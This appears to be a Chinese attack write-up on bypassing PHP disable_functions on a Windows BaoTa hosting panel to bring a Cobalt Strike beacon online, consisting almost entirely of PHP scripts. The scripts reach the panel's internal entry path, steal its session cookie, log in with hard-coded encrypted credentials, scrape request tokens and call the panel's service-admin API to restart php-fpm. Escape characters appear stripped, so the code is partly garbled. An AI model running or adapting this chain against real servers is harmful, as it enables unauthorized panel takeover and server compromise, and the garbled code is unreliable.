记一次绕过win下宝塔的disable_functions到cs上线

<?phpecho file_get_contents("内网面板地址/jinguangdasha/");?>

<?php$url = "内网面板地址";//面板地址$safety = "/jinguangdasha/";//面板入口file_get_contents($url.$safety);$cookie = "";foreach ($http_response_header as $header) {if (preg_match('/^Set-Cookie:s*([^;]+)/', $header, $matches)) {$cookie = $matches[1];}}echo $cookie;?>

<?php$url = "内网面板地址";//面板地址$safety = "/jinguangdasha/";//面板入口file_get_contents($url.$safety);$cookie = "";foreach ($http_response_header as $header) {if (preg_match('/^Set-Cookie:s*([^;]+)/', $header, $matches)) {$cookie = $matches[1];}}echo $cookie;define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true));$header = 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY."rn"."Cookie: ".$cookie."rn";define('FORM_FIELD', 'uploaded_file');$content = "--".MULTIPART_BOUNDARY."rn"."Content-Disposition: form-data; name="username"rnrn"."a5dd26d55a09d7ce7a510a824ee9ebbarn";//加密后的账号$content .= "--".MULTIPART_BOUNDARY."rn"."Content-Disposition: form-data; name="password"rnrn"."620b24a6d3d02afd8cb8aa3c868ba4b2rn";//加密后的密码$content .= "--".MULTIPART_BOUNDARY."--rn";$context = stream_context_create(array('http' => array('method' => 'POST','header' => $header,'content' => $content,)));$a = file_get_contents($url."/login", false, $context);echo $a."<br>";?>

<?php$url = "内网面板地址";//面板地址$safety = "/jinguangdasha/";//面板入口file_get_contents($url.$safety);$cookie = "";foreach ($http_response_header as $header) {if (preg_match('/^Set-Cookie:s*([^;]+)/', $header, $matches)) {$cookie = $matches[1];}}echo $cookie;define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true));$header = 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY."rn"."Cookie: ".$cookie."rn";define('FORM_FIELD', 'uploaded_file');$content = "--".MULTIPART_BOUNDARY."rn"."Content-Disposition: form-data; name="username"rnrn"."a5dd26d55a09d7ce7a510a824ee9ebbarn";//加密后的账号$content .= "--".MULTIPART_BOUNDARY."rn"."Content-Disposition: form-data; name="password"rnrn"."620b24a6d3d02afd8cb8aa3c868ba4b2rn";//加密后的密码$content .= "--".MULTIPART_BOUNDARY."--rn";$context = stream_context_create(array('http' => array('method' => 'POST','header' => $header,'content' => $content,)));$a = file_get_contents($url."/login", false, $context);echo $a."<br>";$cookies = array();foreach ($http_response_header as $hdr) {if (preg_match('/^Set-Cookie:s*([^;]+)/', $hdr, $matches)) {parse_str($matches[1], $tmp);$cookies += $tmp;}}$request_token = $cookies['request_token'];$key= $cookies['SESSIONID'];echo $request_token."@@".$key;$opts = array ('http' => array ('method' => 'GET','header'=>"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8rn" ."Cookie:request_token=".$request_token."; SESSIONID=".$key." rn"."Pragma:no-cachern",));$context2 = stream_context_create($opts);$bb =file_get_contents($url."/soft",false,$context2);echo $bb;?>

<?php$url = "内网面板地址";//面板地址$safety = "/jinguangdasha/";//面板入口file_get_contents($url.$safety);$cookie = "";foreach ($http_response_header as $header) {if (preg_match('/^Set-Cookie:s*([^;]+)/', $header, $matches)) {$cookie = $matches[1];}}echo $cookie;define('MULTIPART_BOUNDARY', '--------------------------'.microtime(true));$header = 'Content-Type: multipart/form-data; boundary='.MULTIPART_BOUNDARY."rn"."Cookie: ".$cookie."rn";define('FORM_FIELD', 'uploaded_file');$content = "--".MULTIPART_BOUNDARY."rn"."Content-Disposition: form-data; name="username"rnrn"."a5dd26d55a09d7ce7a510a824ee9ebbarn";//加密后的账号$content .= "--".MULTIPART_BOUNDARY."rn"."Content-Disposition: form-data; name="password"rnrn"."620b24a6d3d02afd8cb8aa3c868ba4b2rn";//加密后的密码$content .= "--".MULTIPART_BOUNDARY."--rn";$context = stream_context_create(array('http' => array('method' => 'POST','header' => $header,'content' => $content,)));$a = file_get_contents($url."/login", false, $context);echo $a."<br>";$cookies = array();foreach ($http_response_header as $hdr) {if (preg_match('/^Set-Cookie:s*([^;]+)/', $hdr, $matches)) {parse_str($matches[1], $tmp);$cookies += $tmp;}}$request_token = $cookies['request_token'];$key= $cookies['SESSIONID'];echo $request_token."@@".$key;$opts = array ('http' => array ('method' => 'GET','header'=>"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8rn" ."Cookie:request_token=".$request_token."; SESSIONID=".$key." rn"."Pragma:no-cachern",));$context2 = stream_context_create($opts);$bb =file_get_contents($url."/soft",false,$context2);$bb2 = getSubstr($bb,'request_token_head','container-fluid');$bb3 = substr($bb2,9,48);echo "@@".$bb3."<br>";function getSubstr($str, $leftStr, $rightStr){$left = strpos($str, $leftStr);$right = strpos($str, $rightStr,$left);if($left < 0 or $right < $left) return '';return substr($str, $left + strlen($leftStr), $right-$left-strlen($leftStr));}$data = array('name' => 'php-fpm-55',//php版本号'type' => 'restart',);$content666 = http_build_query($data);$content_length = strlen($content666);$options = array('http' => array('method' => 'POST','header' =>"Content-type: application/x-www-form-urlencodedrn" ."Content-length: $content_lengthrn"."Cookie:request_token=".$request_token."; SESSIONID=".$key." rn".'x-http-token:'.$bb3."rn"."x-cookie-token:".$request_token."rn",'content' => $content666));echo file_get_contents($url."/system?action=ServiceAdmin", false, stream_context_create($options));?>